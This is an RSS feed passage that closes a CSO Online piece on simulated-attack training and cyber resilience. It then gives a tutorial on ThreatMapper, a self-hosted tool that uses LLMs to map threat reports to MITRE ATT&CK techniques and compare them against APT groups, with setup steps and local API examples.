<p>Finally, attackers are sharing knowledge all the time. <a href="https://www.csoonline.com/article/4177308/what-the-industrialization-of-exploitation-means-for-defenders.html">Defenders must adopt the same approach</a>. We know that militaries collaborate extensively across allies, agencies, and domains, recognizing that no unit has the full threat picture. Businesses can benefit from this information sharing by participating in ISACs, CERTs, and industry groups, treating threat intel as a collective defense rather than a competitive weakness.</p>



<p>AI Proving Grounds themselves are only part of the solution. Security is cultural, not just procedural. Even the most realistic simulated attack scenario is only useful if structures are in place for stakeholders to learn from it. What didn’t work well? What didn’t go as expected? What are the weakest links in the response chain? These are all questions executives and technical leadership should be comfortable asking themselves, and businesses must adopt cultures of responsibility to identify potential weaknesses beyond technical limitations. Such retrospectives can and should inform rapid-response playbooks to ensure that training is relevant and that weaknesses cannot be exploited in a production environment.</p>



<p>Many of the clients we work with are corporations and enterprises, but AI Proving Grounds have other applications. Recent years have seen coordinated attacks on critical infrastructure such as the nation’s power grid, including the prolonged intrusion by the Volt Typhoon persistent threat actor, which maintained unauthorized access to the operational technology networks of Littleton Electric Light and Water Departments in Massachusetts from February 2024 to November 2024. Such threats can also be simulated in AI Proving Grounds and provide crucial hands-on training opportunities for critical infrastructure providers that, until now, have been challenging to realistically model. With geopolitical tensions rising across the globe, operational readiness has never been more critical.</p>



<p>“Cyber resilience” has become something of a buzzword in itself and I can almost hear the eye rolls just using the phrase, but it is something the military does actively practice. Cyber resilience isn’t about prevention; it means being able to recover from as well as protect against attacks. With <a href="https://www.csoonline.com/article/4159305/helmut-reisinger-palo-alto-networks-anthropics-groundbreaking-mythos-model-represents-a-radical-shift-in-cybersecurity.html">AI-powered adversaries scaling their approach</a> to infiltration, extortion, and espionage, attacks are only going to increase and businesses need to be prepared to deal with them as well as prevent them. Continuous training within highly realistic and dynamic environments against real threat examples is the best way to ensure your teams are prepared at a military grade to secure your organization.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.csoonline.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[ThreatMapper: I Built a Self-Hosted AI Threat Intelligence Platform — Here’s How to Use It]]></title>
<description><![CDATA[Map adversary behaviour to MITRE ATT&CK in seconds, compare against 160+ APT groups, and generate PDF reports — all running locally with your own LLM keys.Table of ContentsThe ProblemWhat ThreatMapper DoesArchitecture in BriefSetting Up (10 Minutes)Core Workflow: Analysing a Threat ReportThe Navi...]]></description>
<link>https://tsecurity.de/de/3580444/hacking/threatmapper-i-built-a-self-hosted-ai-threat-intelligence-platform-heres-how-to-use-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580444/hacking/threatmapper-i-built-a-self-hosted-ai-threat-intelligence-platform-heres-how-to-use-it/</guid>
<pubDate>Mon, 08 Jun 2026 06:38:23 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4><em>Map adversary behaviour to MITRE ATT&amp;CK in seconds, compare against 160+ APT groups, and generate PDF reports — all running locally with your own LLM keys.</em></h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*31Nq2VMJ9Mm9lgryHGJRQQ.png"></figure><h3>Table of Contents</h3><ol><li><a href="https://infosecwriteups.com/threatmapper-i-built-a-self-hosted-ai-threat-intelligence-platform-heres-how-to-use-it-0aa7673e6bd8#da6e"><strong>The Problem</strong></a></li><li><a href="https://infosecwriteups.com/threatmapper-i-built-a-self-hosted-ai-threat-intelligence-platform-heres-how-to-use-it-0aa7673e6bd8#fd6d"><strong>What ThreatMapper Does</strong></a></li><li><a href="https://infosecwriteups.com/threatmapper-i-built-a-self-hosted-ai-threat-intelligence-platform-heres-how-to-use-it-0aa7673e6bd8#a178"><strong>Architecture in Brief</strong></a></li><li><a href="https://infosecwriteups.com/threatmapper-i-built-a-self-hosted-ai-threat-intelligence-platform-heres-how-to-use-it-0aa7673e6bd8#23a4"><strong>Setting Up (10 Minutes)</strong></a></li><li><a href="https://infosecwriteups.com/threatmapper-i-built-a-self-hosted-ai-threat-intelligence-platform-heres-how-to-use-it-0aa7673e6bd8#defb"><strong>Core Workflow: Analysing a Threat Report</strong></a></li><li><a href="https://infosecwriteups.com/threatmapper-i-built-a-self-hosted-ai-threat-intelligence-platform-heres-how-to-use-it-0aa7673e6bd8#c6ed"><strong>The Navigator: Your ATT&amp;CK Workspace</strong></a></li><li><a href="https://infosecwriteups.com/threatmapper-i-built-a-self-hosted-ai-threat-intelligence-platform-heres-how-to-use-it-0aa7673e6bd8#a6e6"><strong>APT Attribution Deep-Dive: Three Compare Modes</strong></a></li><li><a href="https://infosecwriteups.com/threatmapper-i-built-a-self-hosted-ai-threat-intelligence-platform-heres-how-to-use-it-0aa7673e6bd8#3ebb"><strong>Two Databases: Actor Profiles and Your Report Library</strong></a></li><li><a href="https://infosecwriteups.com/threatmapper-i-built-a-self-hosted-ai-threat-intelligence-platform-heres-how-to-use-it-0aa7673e6bd8#8acb"><strong>Generating Reports</strong></a></li><li><a href="https://infosecwriteups.com/threatmapper-i-built-a-self-hosted-ai-threat-intelligence-platform-heres-how-to-use-it-0aa7673e6bd8#859f"><strong>Using the AI Chat Assistant</strong></a></li><li><a href="https://infosecwriteups.com/threatmapper-i-built-a-self-hosted-ai-threat-intelligence-platform-heres-how-to-use-it-0aa7673e6bd8#65d3"><strong>Working with All Three ATT&amp;CK Domains</strong></a></li><li><a href="https://infosecwriteups.com/threatmapper-i-built-a-self-hosted-ai-threat-intelligence-platform-heres-how-to-use-it-0aa7673e6bd8#be03"><strong>API Usage (Headless / CI Integration)</strong></a></li><li><a href="https://infosecwriteups.com/threatmapper-i-built-a-self-hosted-ai-threat-intelligence-platform-heres-how-to-use-it-0aa7673e6bd8#c349"><strong>Keeping ATT&amp;CK Data Fresh</strong></a></li><li><a href="https://infosecwriteups.com/threatmapper-i-built-a-self-hosted-ai-threat-intelligence-platform-heres-how-to-use-it-0aa7673e6bd8#489e"><strong>Tips for Analysts</strong></a></li><li><a href="https://infosecwriteups.com/threatmapper-i-built-a-self-hosted-ai-threat-intelligence-platform-heres-how-to-use-it-0aa7673e6bd8#b883"><strong>Security Considerations</strong></a></li><li><a href="https://infosecwriteups.com/threatmapper-i-built-a-self-hosted-ai-threat-intelligence-platform-heres-how-to-use-it-0aa7673e6bd8#5f65"><strong>What’s Coming Next</strong></a></li><li><a href="https://infosecwriteups.com/threatmapper-i-built-a-self-hosted-ai-threat-intelligence-platform-heres-how-to-use-it-0aa7673e6bd8#f668"><strong>Final Thoughts</strong></a></li></ol><h3>The tool:</h3><p><a href="https://github.com/anpa1200/threatmapper">GitHub - anpa1200/threatmapper: AI-powered MITRE ATT\&amp;CK threat intelligence platform - D3.js navigator, APT comparison, Claude/GPT-4o/Gemini analysis, PDF reports</a></p><h4><strong>Docs</strong>:</h4><p><a href="https://anpa1200.github.io/threatmapper-docs/">ThreatMapper - Self-Hosted AI Threat Intelligence | ThreatMapper</a></p><h3>The Problem</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*69nMwI7Xj8eNIWHv_C_KVg.png"></figure><p>Every threat intelligence analyst knows the workflow: you receive a malware report, an IR summary, or a threat feed entry, and you need to translate it into ATT&amp;CK technique IDs so you can slot it into a detection backlog or a purple-team plan.</p><p>Doing this manually is slow. You read the report, recognise a behaviour (“the implant used scheduled tasks for persistence”), pull up the ATT&amp;CK website, search for the technique, copy the ID. Repeat 20 times for a single report. Then someone asks: <em>“Does this look like APT29?”</em> — and you start manually cross-referencing technique lists.</p><p>There are commercial platforms that do this — but they are expensive, require data to leave your environment, and often treat ATT&amp;CK as a secondary feature behind proprietary kill-chains.</p><p><strong>ThreatMapper</strong> is my attempt to solve this for analysts who want a self-hosted, privacy-first, open-source option that uses the LLM API keys they already have.</p><h3>What ThreatMapper Does</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*7jquz_YKO0Odni3r3InzYw.png"></figure><p>In one sentence: <strong>you give it a threat report, it gives you ATT&amp;CK technique IDs, APT group matches, confidence scores, and a PDF.</strong></p><p><strong>Concretely:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*VAfpLRWhfkB0pwRR5C4Nlw.png"></figure><ul><li><strong>AI Analysis</strong> — upload a PDF, DOCX, or TXT file (or paste text), pick Claude, GPT-4o, or Gemini, and get a streamed extraction of every ATT&amp;CK technique the LLM identifies with evidence snippets and confidence scores</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/502/1*Up-LNxuga22bScwyZiFuHA.png"></figure><ul><li><strong>ATT&amp;CK Navigator</strong> — an interactive heatmap of the full ATT&amp;CK matrix (Enterprise, Mobile, ICS) where you build and explore your TTP layer</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*4zLLN71CBFHIMCEPOrTxmw.png"></figure><ul><li><strong>APT Attribution</strong> — automatic Jaccard similarity ranking of every extraction against 174+ named ATT&amp;CK threat groups and 56+ named campaigns (e.g. “Operation Ghost”, “SolarWinds Compromise”)</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Dw7KTqHRijCEkYvUrdBMbQ.png"></figure><ul><li><strong>Compare</strong> — deep side-by-side comparison of your TTP set against groups, MITRE named campaigns, or your own stored report library; with visual matrix diff, tactic breakdown chart, and gap analysis</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*07j05Kn78RJY96S3Ga4IVQ.png"></figure><ul><li><strong>Export</strong> — ATT&amp;CK Navigator-compatible JSON layers and multi-page PDF reports suitable for executive briefings</li></ul><p>Everything runs locally in Docker. Your threat reports never leave your machine.(With local or private LLM)</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*z711T5SOrORpjITlM2IY9A.png"></figure><h3>Architecture in Brief</h3><p>ThreatMapper is four containers:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*a6c9YTdIktlPk1w0FRQHaA.png"></figure><p>The backend ingests ATT&amp;CK STIX 2.1 bundles directly from MITRE’s GitHub repository using pure Python — no third-party ATT&amp;CK library, fully compatible with Python 3.12. All three ATT&amp;CK domains (Enterprise, Mobile, ICS) are parsed and stored in PostgreSQL with JSONB arrays for the STIX arrays.</p><p>LLM calls go directly from the FastAPI backend to Anthropic / OpenAI / Google using their official SDKs. Your API keys never touch a third-party service beyond the LLM provider itself.</p><h3>Setting Up (10 Minutes)</h3><h4>Prerequisites</h4><ul><li>Docker + Docker Compose</li><li>An API key for at least one of: Anthropic (Claude), OpenAI, Google Gemini</li></ul><h4>Step 1: Clone and configure</h4><pre>git clone https://github.com/anpa1200/threatmapper.git<br>cd threatmapper<br>cp .env.example .env</pre><p><strong>Important:</strong> you must create .env before running docker compose up. Without it the container starts with empty API keys and AI Analysis returns 500.</p><p>Open .env and add your keys. You only need one:</p><pre>ANTHROPIC_API_KEY=sk-ant-...<br># OPENAI_API_KEY=sk-...<br># GEMINI_API_KEY=AIza...<br>DB_PASS=choose_a_strong_password</pre><pre>If you want a faster first start and only need Enterprise ATT&amp;CK, set:</pre><pre>ATTCK_DOMAINS=enterprise-attack</pre><p>This downloads ~35 MB instead of ~105 MB.</p><h4>Step 2: Start</h4><pre>docker compose up</pre><p>The first start downloads and ingests ATT&amp;CK data automatically. Watch progress:</p><pre>docker compose logs -f api</pre><p>You’ll see something like:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*z4L2KcZIixQjdkrcBt8OlA.png"></figure><pre>Parsing enterprise-attack-19.1.json ...<br>  Parsed: 15 tactics, 760 techniques, 174 groups, 56 campaigns, 9100+ usages<br>Finished ingesting enterprise-attack v19.1<br>INFO:     Application startup complete.</pre><p>This takes 5–15 minutes depending on your network speed. Subsequent startups are instant (data is cached in the PostgreSQL volume).</p><h4>Step 3: Open</h4><ul><li>Frontend: <a href="http://localhost:3000/">http://localhost:3000</a></li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*l_EPylZmZEnAaDF6JjQE4w.png"></figure><ul><li>API docs (Swagger UI): <a href="http://localhost:8000/docs">http://localhost:8000/docs</a></li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*CsGSK7APVQvnvTDCLxXKNA.png"></figure><h3>Core Workflow: Analysing a Threat Report</h3><p>This is the killer feature and what most analysts will use day-to-day.</p><h4>Upload your report</h4><p>Navigate to <strong>Analyze</strong> in the sidebar. You’ll see:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/496/1*EsC2UAT23n0xRDPv29oEWg.png"></figure><ol><li>A provider dropdown (Claude / GPT-4o / Gemini)</li><li>An optional model override (defaults to claude-opus-4-8, gpt-4o, gemini-2.0-flash)</li><li>A domain selector (enterprise-attack for most corporate IR work)</li><li>A text area or file upload</li></ol><p>For a PDF analysis report:</p><ol><li>Select <strong>Claude</strong> (or your preferred provider)</li><li>Leave the domain as enterprise-attack</li><li>Click <strong>Choose file</strong> and upload your PDF</li><li>Click <strong>Analyse with AI</strong></li></ol><p>You’ll immediately see the LLM’s response streaming in the output box — token by token, just like ChatGPT. This is not a spinner that makes you wait: you can read the thinking as it happens.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*89fT-TuOac6OMSNdZ61vag.png"></figure><h4>Reading the results</h4><p>When the stream completes, three tabs appear:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/273/1*FpAXPkiL1j3fiuOkL7tp8A.png"></figure><p><strong>Techniques tab</strong> — the core output. Each row shows:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/675/1*aSqu_irokLlGQa1Njwa0fQ.png"></figure><p>FieldExampleATT&amp;CK IDT1059.001NamePowerShellTacticExecutionConfidence92%Evidence<em>”executed a base64-encoded PowerShell payload”</em></p><p>The evidence field is a direct quote or paraphrase from your source document — you can use it to trace every mapping back to its origin in the text. High confidence (≥ 80%) means the text explicitly described the behaviour; lower scores mean it was inferred.</p><p><strong>APT Matches tab</strong> — the attribution layer. Computed locally using Jaccard similarity between your extracted techniques and every named ATT&amp;CK group’s known TTP set. The top 10 are shown with:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*RL5VY8-RMrIQv_SIZpwPQQ.png"></figure><ul><li>Similarity score (0–100%)</li><li>Shared technique count</li><li>List of the overlapping technique IDs</li></ul><p>A match above 25–30% is worth investigating. Don’t treat this as definitive attribution — use it as a lead for further research.</p><p><strong>Raw Response</strong> — the LLM’s full JSON output. Useful for debugging when the model outputs something unexpected.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*T8D25vI8Mt2T7iWmqEJkfA.png"></figure><h3>Inject into Navigator</h3><p>Click <strong>→ Inject into Navigator</strong> to push all extracted techniques into your live Navigator layer. You can then:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*q9LHKlOmbS1119qTlPKjIA.png"></figure><ul><li>See the techniques highlighted on the full ATT&amp;CK matrix</li><li>Overlay an APT group to visualise the behavioural overlap</li><li>Export as an ATT&amp;CK Navigator JSON layer</li></ul><h3>The Navigator: Your ATT&amp;CK Workspace</h3><p>The Navigator is the central hub. It renders the full ATT&amp;CK matrix as an interactive heatmap with D3.js zoom/pan.</p><h4>Building a layer</h4><p>Click any technique cell to add it to your layer (it turns red). Click again to deselect. For sub-techniques, click the small ▶ arrow to expand the parent cell and see the sub-technique rows.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*QkMDTHSy82_j4PA96Q3j6A.png"></figure><p><strong>Practical tip:</strong> use the search box to find techniques by name or ID without manually scanning the matrix. Type T1059 to jump to all Command and Scripting Interpreter techniques, or type phish to find all phishing-related techniques.</p><h4>Overlaying an APT group</h4><ol><li>Go to <strong>APT Library</strong> and find your group of interest</li><li>Click <strong>Overlay on Navigator</strong></li><li>Return to <strong>Navigator</strong></li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*62_zstQMYPoqj4kSTn4nBg.png"></figure><p>The matrix now uses three colours:</p><ul><li><strong>Red</strong> — in your layer only</li><li><strong>Blue</strong> — in the APT group’s profile only</li><li><strong>Amber</strong> — in both (the overlap)</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XfbZTKCAGTSArnhi3tiMOA.png"></figure><p>This visual immediately answers: <em>“Which of this group’s known techniques am I not already detecting?”</em></p><h4>Importing an existing layer</h4><p>If you already have ATT&amp;CK Navigator layers from previous work, click <strong>↑ Import layer</strong> and upload the JSON. ThreatMapper will load it as your active layer, which you can then enrich with AI analysis or compare against APT groups.</p><h4>Saving and Loading Named Layers</h4><p>Once you have built a TTP layer — whether through AI analysis, manual selection, or an APT campaign overlay — you can save it to the database with a name and reload it in any future session.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/584/1*m1Zh30Hm7e6wmzZq1Mjdog.png"></figure><h4>Why this matters</h4><p>Without persistence, every session starts blank. You would have to re-inject or re-select all your techniques each time you come back to a piece of work. Named layers let you:</p><ul><li><strong>Bookmark a specific investigation.</strong> Save “Lazarus Q1 2025 incident” at 47 techniques and return to it a week later exactly where you left off.</li><li><strong>Build a fingerprint library.</strong> Save a layer for each major campaign you track — “Operation Ghost TTPs”, “SolarWinds Compromise TTPs” — and reload any of them for comparison without re-running AI analysis.</li><li><strong>Maintain a baseline.</strong> Keep a “What we detect” layer with your detection coverage and a “What we’ve seen” layer of your observed incidents. Load each into a fresh session to compare.</li><li><strong>Share work across team members.</strong> Layers are stored in the shared PostgreSQL database, so a layer saved by one analyst is visible to all.</li></ul><h4>Saving a layer</h4><ol><li>Select your techniques in Navigator (they turn red)</li><li>Click <strong>↓ Save layer</strong> in the toolbar — this button appears only when at least one technique is selected</li><li>Enter a descriptive name (e.g. <em>“MuddyWater CTI analysis — April 2025”</em>)</li><li>Press Enter or click <strong>Save</strong></li></ol><p>The layer is immediately written to the database. The technique IDs are stored in sorted, deduplicated form together with the domain.</p><h4>Loading a layer</h4><ol><li>Click <strong>📂 Load layer</strong> in the toolbar (always visible)</li><li>A list of all saved layers appears, each showing the name, technique count, domain, and last-modified date</li><li>Click <strong>Load</strong> — the saved layer replaces your current selection entirely</li></ol><p>To delete a layer you no longer need, click the <strong>✕</strong> button next to it in the Load dialog and confirm.</p><h3>APT Attribution Deep-Dive: Three Compare Modes</h3><p>The Compare view has three modes selectable from a switcher at the top of the page.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*lKoiwInK4AuBHDFSINWekA.png"></figure><h4>Mode 1 — Groups (DB 1)</h4><p>With techniques selected in Navigator (or injected from an AI analysis), navigate to <strong>Compare</strong>, make sure <strong>Groups (DB 1)</strong> is selected, and click <strong>Compare vs APT Groups</strong>. This ranks all 174+ threat groups by Jaccard similarity.</p><p>Click any group to open the four-tab detail view:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*aJW4II93D-bLqFMexDlW1g.png"></figure><p><strong>Overview</strong> — similarity score, shared technique chips (amber), techniques only in your layer (red). Answers: <em>“How much of our observed behaviour matches this group’s known playbook?”</em></p><p><strong>Tactic Breakdown</strong> — stacked bar per kill-chain phase: shared / user-only / APT-only. Reveals <em>where</em> in the kill chain the overlap is concentrated.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_Dlqijzjnt_Ehr1ULHPmrg.png"></figure><p><strong>Visual Diff</strong> — compact colour-strip matrix. Best for presentations.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*lLkb-oRUX5Tns2S85SS16g.png"></figure><p><strong>Gap Analysis</strong> — every technique in the group’s known profile not in your layer. This is your detection backlog.</p><h4>Mode 2 — Campaigns (DB 1)</h4><p>Switch to <strong>Campaigns (DB 1)</strong> and click <strong>Compare vs Campaigns</strong>. This ranks all 56+ named MITRE operations by Jaccard similarity.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*0dTCvSgZ4dMeQDXkbutXPA.png"></figure><p><strong>Why this is more precise than group comparison:</strong> A group’s aggregate profile spans years. A campaign profile is one specific attack. Matching your TTPs against C0024 (SolarWinds Compromise) at 40% is a sharper lead than matching against G0016 (APT29) at 15%.</p><h4>Mode 3 — Reports (DB 2)</h4><p>Switch to <strong>Reports (DB 2)</strong>. The left panel lists every AI analysis you have ever run. Click any report to re-run Jaccard comparison against all ATT&amp;CK groups — without re-calling the LLM.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ecTDnydMYwWX8-Ncuk8GfQ.png"></figure><p>Use this for retrospective attribution after ATT&amp;CK releases new group data, or to cluster multiple incidents under a common actor.</p><h4>Practical attribution workflow</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*JDE0azpONj0OVW95p9yZkg.png"></figure><ol><li>Run AI analysis on your incident data (give it a descriptive name)</li><li>Inject extracted techniques into Navigator</li><li>Compare → Groups mode: look for similarity &gt; 25%</li><li>Compare → Campaigns mode: check if the top group has a campaign that fits the timeline</li><li>Gap Analysis tab: use the technique gap as a structured hunt checklist</li><li>Download the PDF report for your findings</li></ol><h3>Two Databases: Actor Profiles and Your Report Library</h3><p>When you dig into attribution you quickly realise there are two different things you want to compare against:</p><ol><li><strong>What MITRE says groups have done</strong> — the curated ATT&amp;CK dataset of group TTP profiles, including named campaigns (specific operations like “Operation Ghost”)</li><li><strong>What you have actually observed</strong> — your own library of analysed reports, each with its own extracted TTP mapping</li></ol><p>ThreatMapper v0.3 builds both into a single comparison workflow via three modes in the <strong>Compare</strong> view.</p><h4>DB 1: MITRE Actor Profiles and Named Campaigns</h4><p>The ATT&amp;CK STIX 2.1 bundle contains more than just group TTP profiles. It also includes:</p><ul><li><strong>campaign objects</strong> — named operations with their own ATT&amp;CK IDs (e.g. C0023 = "Operation Ghost", C0025 = "2016 Ukraine Electric Power Attack")</li><li><strong>attributed-to relationships</strong> — which group conducted which campaign</li><li><strong>uses relationships at the campaign level</strong> — the specific techniques observed in each named operation (often different from the group's aggregate profile)</li></ul><p>ThreatMapper parses all of this during ATT&amp;CK ingestion. The result is two searchable, comparable datasets that both live in DB 1:</p><p>DatasetWhat it containsID formatAPT GroupsAggregate TTP profile of each named threat groupG0001 — G0174+CampaignsTTP profile of each named operation/campaignC0001 — C0063+</p><p><strong>Why campaigns matter:</strong> A group’s aggregate profile is the union of everything ever attributed to them across all operations and years. A campaign profile is specific to one attack. Comparing your incident TTPs against campaigns is often more discriminating than comparing against the full group — an incident that matches C0023 (Operation Ghost) at 45% similarity is a more specific lead than a match against G0016 (APT29) at 15%.</p><h4>Viewing campaigns in the APT Library</h4><p>The APT Library now has two tabs per group:</p><ul><li><strong>Techniques</strong> — the full aggregate TTP list (existing behaviour)</li><li><strong>Campaigns (DB 1)</strong> — all named operations attributed to this group</li></ul><p>Each campaign card shows the date range, technique count, and ATT&amp;CK ID. Click to expand and see the full technique list with the use description from STIX.</p><p>The <strong>“Add to my TTPs”</strong> button on each campaign card pushes all of that campaign’s techniques into your Navigator layer — useful for building a “this specific operation’s TTP fingerprint” layer to compare against your detection coverage.</p><h4>DB 2: Your Report Library</h4><p>Every time you run an AI analysis in ThreatMapper, the result is stored: the extracted techniques, the summary, the APT matches, and the provider/model used. DB 2 is this library of past analyses.</p><p>Access it via <strong>Compare → Reports (DB 2)</strong>.</p><p>The left panel lists every completed report session with:</p><ul><li>Name (the filename or label you gave it when you uploaded)</li><li>Technique count</li><li>Domain</li><li>Provider and model used</li><li>Date</li></ul><p>Click any report to run a fresh Jaccard comparison of that report’s extracted techniques against all ATT&amp;CK groups. This answers: <em>“If I come back to this report from three months ago — which groups match its TTP profile?”</em></p><p>This is useful in a few scenarios:</p><p><strong>Retrospective attribution:</strong> You analysed a report before you had a strong hypothesis about the actor. A new ATT&amp;CK version was released that added new groups or techniques. Rerun the comparison against the updated ATT&amp;CK data without re-running the expensive LLM analysis.</p><p><strong>Cross-incident correlation:</strong> If two reports from different incidents both have high similarity to the same APT group, that’s a data point for clustering the incidents under the same actor.</p><p><strong>Building a baseline:</strong> Accumulate 20 reports over a quarter. In the Reports library you can see at a glance which groups are recurring themes across your incident set — a form of environmental threat profiling.</p><h4>The three Compare modes</h4><p>ModeWhat you compareAgainst<strong>Groups (DB 1)</strong>Your selected TTPs (from Navigator)All 174+ ATT&amp;CK groups<strong>Campaigns (DB 1)</strong>Your selected TTPs (from Navigator)All named MITRE campaigns<strong>Reports (DB 2)</strong>A stored report’s extracted TTPsAll 174+ ATT&amp;CK groups</p><p>Use the mode switcher at the top of the Compare page to move between them.</p><h4>API for both databases</h4><p>Compare against campaigns:</p><pre>curl -X POST "http://localhost:8000/api/apt/campaigns/compare?domain=enterprise-attack&amp;top_n=10" \<br>  -H "Content-Type: application/json" \<br>  -d '{"technique_ids": ["T1566.001", "T1059.001", "T1078", "T1021.001"]}'</pre><p>List your stored report sessions:</p><pre>curl "http://localhost:8000/api/analyze/sessions?limit=20" | python -m json.tool</pre><p>Re-compare a stored report:</p><pre>SESSION_ID="550e8400-e29b-41d4-a716-446655440000"<br>curl -X POST "http://localhost:8000/api/analyze/sessions/$SESSION_ID/compare?top_n=10"</pre><p>List campaigns for a specific group:</p><pre>curl "http://localhost:8000/api/apt/campaigns?domain=enterprise-attack&amp;group_id=G0016"</pre><h3>Generating Reports</h3><p>ThreatMapper generates two types of PDF reports.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/581/1*oyHjzN-tAx7Lx19Xg0IPyA.png"></figure><h4>Analysis report</h4><p>From the <strong>Analyze</strong> page, after a completed analysis, click <strong>Download PDF</strong>. The report is formatted for sharing with management or a client and includes:</p><ul><li>Cover page with provider, model, domain, session ID, and timestamp</li><li>Executive summary (the AI-generated TL;DR)</li><li>Extracted techniques table sorted by confidence descending</li><li>APT attribution section with the top 10 Jaccard matches</li><li>Tactic coverage breakdown showing how the techniques distribute across the kill chain</li></ul><h4>Navigator layer report</h4><p>From the <strong>Navigator</strong>, click <strong>↓ PDF</strong> in the toolbar. This generates a lighter report listing all techniques in your current layer with their ATT&amp;CK IDs, tactics, and platforms — useful as a rapid deliverable for a purple-team session or a detection engineering sprint.</p><h3>Using the AI Chat Assistant</h3><p>Every technique in the detail panel has an embedded AI chat. This is not a generic chatbot — it is a threat intelligence assistant with the full ATT&amp;CK description of the selected technique already in context.</p><p><strong>Practical prompts that work well:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/433/1*Rai3eOrk1Upsd4zeHxtroA.png"></figure><p>For detection engineering:</p><blockquote>“Write a SIGMA rule for detecting this technique on Windows via Sysmon events”</blockquote><p>For understanding evasion:</p><blockquote>“How do attackers modify this technique to avoid common detections?”</blockquote><p>For hunting:</p><blockquote>“What should I look for in Windows Security event logs to hunt for this technique? Give me specific event IDs and field values.”</blockquote><p>For red teaming context:</p><blockquote>“Which tools in the open-source red team ecosystem implement this technique?”</blockquote><p>For correlation:</p><blockquote>“Which techniques are commonly chained with this one in post-exploitation workflows?”</blockquote><p>The <strong>context</strong> field at the bottom of the chat lets you paste additional information — for example, a log snippet or a list of technique IDs from your current investigation. This gives the assistant grounding in your specific situation. The context field accepts up to 8,000 characters.</p><h3>Working with All Three ATT&amp;CK Domains</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/466/1*lp9MmZunILgId0X7JHQVbw.png"></figure><p>ThreatMapper supports Enterprise, Mobile, and ICS ATT&amp;CK out of the box.</p><p>Switch domains using the <strong>Domain</strong> dropdown in the Navigator toolbar or the Analyze page.</p><p><strong>Enterprise ATT&amp;CK</strong> — 641 techniques, 163 groups. Use for traditional IT infrastructure incidents: Windows/Linux/macOS endpoints, cloud workloads, Active Directory environments.</p><p><strong>Mobile ATT&amp;CK</strong> — covers Android and iOS threat behaviours. Useful for incidents involving mobile device management (MDM) bypass, spyware, or mobile-targeting APT campaigns.</p><p><strong>ICS ATT&amp;CK</strong> — covers operational technology and industrial control systems. Use for incidents involving SCADA, PLCs, HMIs, or critical infrastructure.</p><p>Each domain has its own set of tactics, techniques, and APT groups. When you run an AI analysis, select the appropriate domain so the Jaccard comparison runs against groups known for activity in that domain.</p><h3>API Usage (Headless / CI Integration)</h3><p>ThreatMapper exposes a full REST API. You can drive the entire workflow programmatically.</p><h4>Analyse a report via API</h4><pre>curl -X POST http://localhost:8000/api/analyze \<br>  -F "provider=claude" \<br>  -F "domain=enterprise-attack" \<br>  -F "file=@incident_report.pdf" \<br>  | python -m json.tool</pre><p>Response:</p><pre>{<br>  "session_id": "550e8400-e29b-41d4-a716-446655440000",<br>  "provider": "claude",<br>  "model": "claude-opus-4-8",<br>  "summary": "The report describes a spearphishing campaign ...",<br>  "techniques": [<br>    {<br>      "attack_id": "T1566.001",<br>      "name": "Spearphishing Attachment",<br>      "tactic": "initial-access",<br>      "confidence": 0.95,<br>      "evidence": "the email contained a malicious Excel attachment"<br>    }<br>  ],<br>  "apt_matches": [<br>    {<br>      "group_attack_id": "G0016",<br>      "group_name": "APT29",<br>      "similarity": 0.34,<br>      "shared_count": 8,<br>      "shared_techniques": ["T1566.001", "T1059.001", ...]<br>    }<br>  ]<br>}</pre><h4>Compare a known technique set via API</h4><pre>curl -X POST "http://localhost:8000/api/apt/compare?domain=enterprise-attack&amp;top_n=5" \<br>  -H "Content-Type: application/json" \<br>  -d '{"technique_ids": ["T1566.001", "T1059.001", "T1078", "T1021.001", "T1003.001"]}' \<br>  | python -m json.tool</pre><h4>Manage saved layers via API</h4><pre># List all saved layers (optionally filter by domain)<br>curl "http://localhost:8000/api/layers?domain=enterprise-attack" | python -m json.tool<br># Save a layer<br>curl -X POST http://localhost:8000/api/layers \<br>  -H "Content-Type: application/json" \<br>  -d '{"name": "MuddyWater Q1 indicators", "domain": "enterprise-attack",<br>       "technique_ids": ["T1566.001", "T1059.001", "T1078", 